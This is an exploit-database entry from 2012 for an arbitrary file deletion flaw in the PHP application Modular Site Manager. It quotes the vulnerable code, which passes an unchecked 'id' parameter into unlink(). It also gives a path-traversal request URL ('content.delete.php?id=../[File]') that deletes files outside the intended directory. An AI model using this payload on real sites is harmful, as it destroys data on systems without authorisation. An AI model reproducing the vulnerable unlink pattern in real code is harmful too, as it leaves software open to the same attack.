Modular Site Manager <= Arbitrary Delete Vulnerability

2012-08-11T00:00:00
ID 1337DAY-ID-19153
Type zdt
Reporter GoLd_M
Modified 2012-08-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Modular Site Manager <= Arbitrary Delete Vulnerability
# Date: 11/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/phpmsm/
# Category:: Arbitrary Delete Vulnerability
# Google dork: :(
# Tested on: Xp SP 2
# Ex :  [Modular Site Manager]/lk/content.delete.php?id=../[File]
# Code Page /lk/content.delete.php
# <?php
#      unlink('../content/'.$_GET['id']); << --- XXX
#      header("Location: ".$_SERVER['HTTP_REFERER']);
# ?>



#  0day.today [2018-03-20]  #